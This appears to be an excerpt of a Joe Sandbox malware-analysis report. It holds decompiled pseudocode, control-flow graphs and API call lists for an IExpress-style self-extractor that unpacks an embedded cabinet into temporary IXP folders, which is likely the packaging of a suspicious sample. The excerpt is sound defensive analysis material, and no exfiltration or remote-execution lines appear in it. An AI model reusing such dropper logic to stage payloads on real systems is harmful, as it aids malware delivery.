                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b03
                                                                                                                                                                                                                                            0x00a95b05
                                                                                                                                                                                                                                            0x00a95b08
                                                                                                                                                                                                                                            0x00a95b20
                                                                                                                                                                                                                                            0x00a95b27
                                                                                                                                                                                                                                            0x00a95b52
                                                                                                                                                                                                                                            0x00a95b52
                                                                                                                                                                                                                                            0x00a95b5b
                                                                                                                                                                                                                                            0x00a95b62
                                                                                                                                                                                                                                            0x00a95b6b
                                                                                                                                                                                                                                            0x00a95b6d
                                                                                                                                                                                                                                            0x00a95b76
                                                                                                                                                                                                                                            0x00a95b7d
                                                                                                                                                                                                                                            0x00a95b83
                                                                                                                                                                                                                                            0x00a95b7f
                                                                                                                                                                                                                                            0x00a95b7f
                                                                                                                                                                                                                                            0x00a95b7f
                                                                                                                                                                                                                                            0x00a95b6f
                                                                                                                                                                                                                                            0x00a95b72
                                                                                                                                                                                                                                            0x00a95b72
                                                                                                                                                                                                                                            0x00a95b85
                                                                                                                                                                                                                                            0x00a95b98
                                                                                                                                                                                                                                            0x00a95b9e
                                                                                                                                                                                                                                            0x00a95b87
                                                                                                                                                                                                                                            0x00a95b8f
                                                                                                                                                                                                                                            0x00a95b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b85
                                                                                                                                                                                                                                            0x00a95b29
                                                                                                                                                                                                                                            0x00a95b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b35
                                                                                                                                                                                                                                            0x00a95b48
                                                                                                                                                                                                                                            0x00a95b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b4a
                                                                                                                                                                                                                                            0x00a95b0f
                                                                                                                                                                                                                                            0x00a95b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b16
                                                                                                                                                                                                                                            0x00a95a7c
                                                                                                                                                                                                                                            0x00a95a8a
                                                                                                                                                                                                                                            0x00a95aa5
                                                                                                                                                                                                                                            0x00a95aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a959bb
                                                                                                                                                                                                                                            0x00a959c0
                                                                                                                                                                                                                                            0x00a959c7
                                                                                                                                                                                                                                            0x00a959d1
                                                                                                                                                                                                                                            0x00a959d6
                                                                                                                                                                                                                                            0x00a95c05
                                                                                                                                                                                                                                            0x00a95c14
                                                                                                                                                                                                                                            0x00a95c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A959A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A959AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A95A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00A95A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A95A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A95A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A95A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A95AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A95BFC
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: cec1c4603227e4d66ba854452c73809151af4eaf72869cbd91e9984e61b82c5b
                                                                                                                                                                                                                                            • Instruction ID: cf13781c1ffcf952c122ec27dcd2d611bebea0298754f13fb84d4b0ed8fc9d06
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cec1c4603227e4d66ba854452c73809151af4eaf72869cbd91e9984e61b82c5b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C17171B1B00618AFEF16DB74CD86BFB77FCEB48340F5441AAF50596140EA349E868B64
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 374 a94fe0-a9501a call a9468f FindResourceA LoadResource LockResource 377 a95161-a95163 374->377 378 a95020-a95027 374->378 379 a95029-a95051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 a95057-a9505e call a94efd 378->380 379->380 383 a9507c-a950b4 380->383 384 a95060-a95077 call a944b9 380->384 389 a950e8-a95104 call a944b9 383->389 390 a950b6-a950da 383->390 388 a95107-a9510e 384->388 392 a9511d-a9511f 388->392 393 a95110-a95117 FreeResource 388->393 398 a95106 389->398 390->398 402 a950dc 390->402 395 a9513a-a95141 392->395 396 a95121-a95127 392->396 393->392 400 a9515f 395->400 401 a95143-a9514a 395->401 396->395 399 a95129-a95135 call a944b9 396->399 398->388 399->395 400->377 401->400 404 a9514c-a95159 SendMessageA 401->404 405 a950e3-a950e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A94FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0xa99144 = E00A9468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0xa99140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0xa98584, 0x841), 5); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E00A94EFD(0, 0); // executed
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E00A94CA0, E00A94CC0, E00A94980, E00A94A50, E00A94AD0, E00A94B60, E00A94BC0, 1, 0xa99148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0xa99148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            						E00A944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0xa91140, 0, E00A94CD0, 0, 0xa99140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            					E00A944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0xa99140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0xa99140 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0xa991d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E00A944B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0xa98a38 & 0x00000001) == 0 && ( *0xa99a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0xa98584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            0x00a95107
                                                                                                                                                                                                                                            0x00a95107
                                                                                                                                                                                                                                            0x00a9510e
                                                                                                                                                                                                                                            0x00a95111
                                                                                                                                                                                                                                            0x00a95117
                                                                                                                                                                                                                                            0x00a95117
                                                                                                                                                                                                                                            0x00a9511f
                                                                                                                                                                                                                                            0x00a95121
                                                                                                                                                                                                                                            0x00a95127
                                                                                                                                                                                                                                            0x00a95135
                                                                                                                                                                                                                                            0x00a95135
                                                                                                                                                                                                                                            0x00a95127
                                                                                                                                                                                                                                            0x00a95141
                                                                                                                                                                                                                                            0x00a95159
                                                                                                                                                                                                                                            0x00a95159
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9515f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A94FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00A95006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00A9500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00A95030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A95037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 00A9504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A95051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A95111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A95159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: e281d9e87874cb7c98f9fb93d2d8ae73eaa8c17bccf97de2c4b3b375ab017996
                                                                                                                                                                                                                                            • Instruction ID: 1e4a63e9f21d12e61d3883a5eef60a0892a6cc4067b0d032eec18e6b773eb9f2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e281d9e87874cb7c98f9fb93d2d8ae73eaa8c17bccf97de2c4b3b375ab017996
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB3107B0B407017FEF209BB9AD8AF6736DCB708795F24061BB901A61A1DE788C038790
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%


                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A953A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A9171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E00A91680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E00A9658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E00A96CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0xa98a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A953FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-7194216
                                                                                                                                                                                                                                            • Opcode ID: 0f9fbdeb4d698ed051bc2a18fb6d6bdfb0156862a0561037a0cdb852bfd1e020
                                                                                                                                                                                                                                            • Instruction ID: 8635cb46836e4ae66b512fdc8b20d6126ee7a366eb4168103feabfbf0b5f4f57
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f9fbdeb4d698ed051bc2a18fb6d6bdfb0156862a0561037a0cdb852bfd1e020
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB110171B0050467DB21EB769D4AFAF36AEEFD2311F000127B646D2190CE74898387A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 478 a95467-a95484 479 a9548a-a95490 call a953a1 478->479 480 a9551c-a95528 call a91680 478->480 483 a95495-a95497 479->483 484 a9552d-a95539 call a958c8 480->484 485 a9549d-a954c0 call a91781 483->485 486 a95581-a95583 483->486 493 a9553b-a95545 CreateDirectoryA 484->493 494 a9554d-a95552 484->494 495 a9550c-a9551a call a9658a 485->495 496 a954c2-a954d8 GetSystemInfo 485->496 489 a9558d-a9559d call a96ce0 486->489 498 a95577-a9557c call a96285 493->498 499 a95547 493->499 500 a95585-a9558b 494->500 501 a95554-a95557 call a9597d 494->501 495->484 504 a954da-a954dd 496->504 505 a954fe 496->505 498->486 499->494 500->489 511 a9555c-a9555e 501->511 509 a954df-a954e2 504->509 510 a954f7-a954fc 504->510 512 a95503-a95507 call a9658a 505->512 514 a954f0-a954f5 509->514 515 a954e4-a954e7 509->515 510->512 511->500 516 a95560-a95566 511->516 512->495 514->512 515->495 518 a954e9-a954ee 515->518 516->486 517 a95568-a95575 RemoveDirectoryA 516->517 517->486 518->512
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A95467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0xa991e4;
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A91680(0xa991e4, 0x104);
                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E00A958C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							 *0xa99124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                            							return E00A96CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t16 = E00A9597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                            						if(_t16 != 0) {
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t61 =  *0xa98a20; // 0x0
                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                            							 *0xa98a20 = 0;
                                                                                                                                                                                                                                            							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                            						 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa98a20 = 1;
                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 =  &_v268;
                                                                                                                                                                                                                                            				_t20 = E00A953A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t48 = 0xa991e4;
                                                                                                                                                                                                                                            				E00A91781(0xa991e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                            				if(( *0xa99a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A9658A(_t48, 0x104, 0xa91140);
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                            				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					_push("i386");
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					E00A9658A(_t48, 0x104);
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = _t26 - 1;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					_push("mips");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = _t28 - 1;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					_push("alpha");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t29 != 1) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push("ppc");
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A954C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9556F
                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A953FB
                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95402
                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9541F
